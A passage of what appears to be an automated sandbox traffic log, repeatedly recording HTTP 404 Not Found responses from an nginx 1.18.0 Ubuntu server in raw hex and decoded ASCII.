69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:33:57 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:01 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:05 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 05 Dec 2024 16:34:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 